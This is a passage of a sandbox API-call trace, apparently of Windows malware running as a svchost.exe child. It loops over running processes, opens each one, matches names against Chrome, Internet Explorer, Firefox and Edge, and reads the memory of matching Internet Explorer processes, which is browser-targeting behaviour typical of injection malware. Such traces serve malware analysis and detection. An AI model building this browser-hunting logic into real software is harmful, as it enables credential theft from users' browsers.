	[0210.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.143] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.143] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0210.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.144] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.144] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0210.145] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x3658
	[0210.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.145] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0210.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.145] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.146] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0210.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.146] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.146] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0210.147] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x365c
	[0210.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.147] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0210.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.147] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.148] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0210.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.149] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.149] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0210.150] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x3660
	[0210.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.150] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0210.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.150] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.151] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0210.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.151] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.152] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0210.152] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x3664
	[0210.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.152] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0210.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.153] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.153] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0210.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.153] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.153] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0210.154] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x3668
	[0210.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.154] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0210.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.155] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.155] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0210.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.156] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.156] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0210.157] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x366c
	[0210.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.157] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0210.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.157] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.158] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0210.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.158] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.159] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0210.159] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x3670
	[0210.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.159] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0210.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.160] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.160] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0210.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.161] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.161] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0210.162] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x3674
	[0210.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.162] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0210.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.163] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.163] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0210.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.164] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.164] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0210.165] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x3678
	[0210.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.165] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0210.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.165] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.166] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0210.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.167] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.167] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0210.168] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x367c
	[0210.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.168] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0210.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.169] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.169] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0210.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.169] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.170] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0210.170] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x3680
	[0210.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.171] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0210.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.171] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0210.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.171] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0210.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.171] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.172] NtQueryInformationProcess (in: ProcessHandle=0x3680, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0210.172] ReadProcessMemory (in: hProcess=0x3680, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0210.172] ReadProcessMemory (in: hProcess=0x3680, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0210.172] ReadProcessMemory (in: hProcess=0x3680, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0210.172] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0210.172] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0210.173] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x3684
	[0210.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.173] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0210.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.173] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0210.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.174] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0210.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.174] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.174] NtQueryInformationProcess (in: ProcessHandle=0x3684, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0210.174] ReadProcessMemory (in: hProcess=0x3684, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0210.174] ReadProcessMemory (in: hProcess=0x3684, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0210.174] ReadProcessMemory (in: hProcess=0x3684, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0210.174] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0210.175] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0210.175] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x3688
	[0210.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.175] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0210.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.176] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.176] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0210.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.176] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.177] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0210.177] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x368c
	[0210.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.177] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0210.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.178] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.178] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0210.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.178] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.179] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.179] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x3690
	[0210.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.180] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.180] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.180] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.181] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.181] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.181] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.182] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x3694
	[0210.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.183] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.183] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.183] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.184] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.184] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0210.185] CloseHandle (hObject=0x188) returned 1
	[0210.185] Sleep (dwMilliseconds=0x64) 
	[0210.290] GetCurrentProcessId () returned 0x110
	[0210.290] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0210.296] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0210.298] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0210.298] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0210.299] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x3698
	[0210.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.299] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0210.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.300] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.300] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0210.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.300] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.300] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0210.301] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x369c
	[0210.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.301] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0210.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.302] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.302] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0210.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.302] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.302] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0210.303] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x36a0
	[0210.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.303] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0210.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.304] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.304] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0210.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.305] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.305] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0210.306] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x36a4
	[0210.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.306] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0210.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.306] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.306] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0210.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.307] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.307] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0210.308] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x36a8
	[0210.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.308] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0210.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.308] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.309] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0210.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.309] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
